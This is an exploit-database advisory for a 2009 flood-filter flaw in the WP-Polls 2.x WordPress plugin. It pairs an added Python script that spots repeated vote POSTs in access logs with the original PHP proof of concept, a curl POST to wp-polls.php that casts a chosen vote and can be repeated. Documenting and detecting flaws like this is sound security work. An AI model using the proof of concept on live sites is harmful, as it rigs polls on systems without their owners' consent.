Vendor: WP-Polls
By: Jbyte
CVSS: 4.3 MEDIUM
Incorrect Flood Filter
CWE: 20
Product Name: WP-Polls
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: N/A
CPE: a:lesterchan:wp-polls
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows XP, Ubuntu 9.04, Ubuntu 9.10
Year: 2009

WP-Polls 2.x Incorrect Flood Filter

WP-Polls 2.x has an incorrect flood filter. An attacker can send a crafted request to the wp-polls.php file with the poll_id and poll_7 parameters set to the ID of the survey and the ID of the vote, respectively. This allows the attacker to vote multiple times in the same survey.

Mitigation:

Upgrade to the latest version of WP-Polls.
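
Repeated vote submissions of the kind described above show up in the web server access log as many POSTs to the plugin file from one client. The following is an added detection example, not part of the original advisory or the plugin's code; it assumes Combined Log Format in time order, and the threshold, window and sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Endpoint named in the advisory. Threshold and window are assumptions to tune.
VOTE_PATH = "/wp-content/plugins/wp-polls/wp-polls.php"
MAX_VOTES = 3
WINDOW = timedelta(minutes=10)

# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_repeat_voters(lines, max_votes=MAX_VOTES, window=WINDOW):
    """Return {ip: peak POST count inside one window} for clients over max_votes.

    Assumes the log is in time order, as access logs normally are.
    """
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        # Only successful (2xx) POSTs are counted as submitted votes.
        if not m or m["method"] != "POST" or not m["status"].startswith("2"):
            continue
        if m["path"].split("?", 1)[0] != VOTE_PATH:  # ignore any query string
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop submissions older than the window
            q.popleft()
        if len(q) > max_votes:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

def _line(ip, hms, method="POST", path=VOTE_PATH):
    # Constructed sample entry (documentation IP ranges, made-up timestamps).
    return f'{ip} - - [01/Jan/2024:{hms} +0000] "{method} {path} HTTP/1.1" 200 512 "-" "-"'

SAMPLE_LOG = (
    [_line("192.0.2.10", f"10:00:{s:02d}") for s in range(0, 50, 10)]    # 5 in 40 s
    + [_line("203.0.113.5", f"{h}:00:00") for h in (11, 12, 13, 14)]     # hours apart
    + [_line("198.51.100.7", "15:00:00"), _line("198.51.100.7", "15:00:05", "GET", "/")]
)

if __name__ == "__main__":
    for ip, count in find_repeat_voters(SAMPLE_LOG).items():
        print(f"{ip}: {count} vote POSTs within {WINDOW}")
```

Standard access logs do not record POST bodies, so this counts submissions per client rather than per poll; clients behind a shared proxy or NAT may need a higher threshold.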

Exploit-DB raw data:

# Exploit Title: WP-Polls 2.x Incorrect Flood Filter
# Date: 30/11/2009
# Author: Jbyte (jbyte-security.blogspot.com)
# Software Link: http://lesterchan.net/wordpress/readme/wp-polls.html
# Version: 2.x
# Tested on: Windows 7/windows xp/ ubuntu 9.04/ ubuntu 9.10
# Code :

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=ID survey here&poll_7=ID to vote here");
curl_exec($ch);

curl_close($ch);
?>